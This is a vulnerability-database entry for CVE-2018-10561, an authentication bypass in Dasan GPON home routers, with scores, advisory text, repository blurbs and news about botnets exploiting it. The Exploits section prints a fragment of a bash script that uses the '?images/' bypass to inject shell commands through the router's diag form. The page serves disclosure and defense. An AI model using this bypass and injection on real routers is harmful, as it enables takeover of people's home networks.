7.5
CVSSv2

CVE-2018-10561

Published: 04/05/2018 Updated: 04/03/2019
CVSS v2 Base Score: 7.5 | Impact Score: 6.4 | Exploitability Score: 10
CVSS v3 Base Score: 9.8 | Impact Score: 5.9 | Exploitability Score: 3.9
VMScore: 760
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P

Vulnerability Summary

An issue exists on Dasan GPON home routers. It is possible to bypass authentication simply by appending "?images" to any URL of the device that requires authentication, as demonstrated by the /menu.html?images/ or /GponForm/diag_FORM?images/ URI. One can then manage the device.

Vulnerability Trend

Affected Products

Vendor Product Versions
DasannetworksGpon Router Firmware-

Vendor Advisories

Summary Multiple GPON Home Routers could allow a remote attacker to bypass security restrictions, caused by a flaw in the authentication mechanism By appending "?images/" to the end of the web address on any of the router's configuration pages, an attacker could exploit this vulnerability to bypass the router's login page and gain complete access ...

Exploits

#!/bin/bash echo "[+] Sending the Command… " # We send the commands with two modes backtick (`) and semicolon (;) because different models trigger on different devices curl -k -d "XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=\`$2\`;$2&ipv=0" $1/GponForm/diag_Form?images/ 2>/dev/null 1>/dev/null echo "[+] Waiti ...

Github Repositories

RCE on GPON home routers (CVE-2018-10561) Press The Hacker News - 1 The Hacker News - 2 KitPloit Security Affairs Vulnerability Many routers today use GPON internet, and a way to bypass all authentication on the devices (CVE-2018-10561) was found by VPNMentor With this authentication bypass, it's also possible to unveil another command injection vulnerability (CVE-2018-1

This is the official repository for the UnderattackToday Python module UnderattackToday Underattack is a free security intelligence platform For more information please visit underattacktoday API Underattack provides a free API described here: portalunderattacktoday/api/docs To use it you should register to the portal, it's free :) The Python module

RCE on GPON home routers (CVE-2018-10561) Press The Hacker News - 1 The Hacker News - 2 KitPloit Security Affairs Vulnerability Many routers today use GPON internet, and a way to bypass all authentication on the devices (CVE-2018-10561) was found by VPNMentor With this authentication bypass, it's also possible to unveil another command injection vulnerability (CVE-2018-1

RCE on GPON home routers (CVE-2018-10561) Press The Hacker News - 1 The Hacker News - 2 KitPloit Security Affairs Vulnerability Many routers today use GPON internet, and a way to bypass all authentication on the devices (CVE-2018-10561) was found by VPNMentor With this authentication bypass, it's also possible to unveil another command injection vulnerability (CVE-2018-1

RCE on GPON home routers (CVE-2018-10561) Press The Hacker News - 1 The Hacker News - 2 KitPloit Security Affairs Vulnerability Many routers today use GPON internet, and a way to bypass all authentication on the devices (CVE-2018-10561) was found by VPNMentor With this authentication bypass, it's also possible to unveil another command injection vulnerability (CVE-2018-1

CVE-2018-10562 CVE-2018-10562 exploit About RCE on GPON home routers [*]CVE-2018-10561:Authentication Bypass [*]CVE-2018-10562: Command Injection Dependencies required requests urllib2 ssl re Screenshots

ABOUT: Sn1per is an automated scanner that can be used during a penetration test to enumerate and scan for vulnerabilities DEMO VIDEO: FEATURES: Automatically collects basic recon (ie whois, ping, DNS, etc) Automatically launches Google hacking queries against a target domain Automatically enumerates open ports via NMap port scanning Automatically brute forces sub-doma

GreyNoise Intelligence Alpha API Summary: GreyNoise is a system that collects and analyzes data on Internet-wide scanners GreyNoise collects data on benign scanners such as Shodanio, as well as malicious actors like SSH and telnet worms The data is collected by a network of sensors deployed around the Internet in various datacenters, cloud providers, and regions URL: https:

ABOUT: Kn0ck is an automated scanner that can be used during a penetration testing to enumerate and scan for vulnerabilities KN0CK FEATURES: Automatically collects basic recon Automatically launches Google hacking queries against a target domain Automatically enumerates open ports via NMap port scanning Automatically brute forces sub-domains, gathers DNS info and checks f

ABOUT: Sn1per Community Edition is an automated scanner that can be used during a penetration test to enumerate and scan for vulnerabilities Sn1per Professional is Xero Security's premium reporting addon for Professional Penetration Testers, Bug Bounty Researchers and Corporate Security teams to manage large environments and pentest scopes For more information regarding

ABOUT: Sn1per Community Edition is an automated scanner that can be used during a penetration test to enumerate and scan for vulnerabilities Sn1per Professional is Xero Security's premium reporting addon for Professional Penetration Testers, Bug Bounty Researchers and Corporate Security teams to manage large environments and pentest scopes For more information regarding

ABOUT: Sn1per Community Edition is an automated scanner that can be used during a penetration test to enumerate and scan for vulnerabilities Sn1per Professional is Xero Security's premium reporting addon for Professional Penetration Testers, Bug Bounty Researchers and Corporate Security teams to manage large environments and pentest scopes For more information regarding

ABOUT: Sn1per Community Edition is an automated scanner that can be used during a penetration test to enumerate and scan for vulnerabilities Sn1per Professional is Xero Security's premium reporting addon for Professional Penetration Testers, Bug Bounty Researchers and Corporate Security teams to manage large environments and pentest scopes For more information regarding

Awesome CVE PoC A curated list of CVE PoCs Here is a collection about Proof of Concepts of Common Vulnerabilities and Exposures, and you may also want to check out awesome-web-security Please read the contribution guidelines before contributing This repo is full of PoCs for CVEs If you enjoy this awesome list and would like to support it, check out my Patreon page :

Recent Articles

Wicked Botnet Uses Passel of Exploits to Target IoT
Threatpost • Tara Seals • 21 May 2018

Yet another variant of the Mirai botnet has appeared on the scene, but this one has a twist: The code is integrated with at least three exploits that target unpatched IoT devices, including closed-circuit cameras and Netgear routers. It also has ties to a web of other botnets, made for DDoS attacks, which can all be traced back to one threat actor.
The original Mirai used traditional brute-force attempts to gain access to connected things in order to enslave them, but the Wicked Botnet, na...

GPON Routers Attacked With New Zero-Day
BleepingComputer • Catalin Cimpanu • 21 May 2018

Attacks on Dasan GPON routers are continuing to happen using two vulnerabilities disclosed last month, but today, researchers from Qihoo 360 Netlab have revealed that one botnet operator appears to have deployed a new zero-day affecting the same router types.
The security firm has refused to release further details on this flaw to prevent more attacks but said it was able to reproduce its effects.
"We tested this payload on two different versions of [Dasan] GPON home router," the Net...

Botnet Party on GPON Routers
BleepingComputer • Catalin Cimpanu • 10 May 2018

At least five IoT botnets are fighting each other and attempting to infect Dasan GPON routers, according to Chinese cyber-security firm Qihoo 360 Netlab.
The five botnets are known under codenames such as Hajime, Mettle, Mirai, Muhstik, and Satori.
The devices they are trying to take over are GPON-capable routers manufactured by South Korean vendor Dasan. GPON stands for Gigabit Passive Optical Network and is a type of telecommunications technology for supporting internet connections...

Vulnerabilities Affecting Over One Million Dasan GPON Routers Are Now Under Attack
BleepingComputer • Catalin Cimpanu • 04 May 2018

Two vulnerabilities affecting over one million routers, and disclosed earlier this week, are now under attack by botnet herders, who are trying to gather the vulnerable devices under their control.
Attacks started yesterday, Thursday, May 3, according to Netlab, the network security division of Chinese cyber-security vendor Qihoo 360.
Exploitation of these two flaws started after on Monday, April 30, an anonymous researcher published details of the two vulnerabilities via the VPNMent...

Millions of Home Fiber Routers Vulnerable to Complete Takeover
Threatpost • Tara Seals • 01 May 2018

UPDATE
Consumers lucky enough to have blazing-fast 1Gbps internet access in their homes are likely to use the internet more than lower-broadband households; however, millions of them are at risk for hackers to gain wide-ranging access to their internet activities (including being able to view full browsing histories).
A comprehensive assessment of various GPON home routers by vpnMentor has uncovered a way to bypass all authentication on the devices (CVE-2018-10561). That flaw can be ...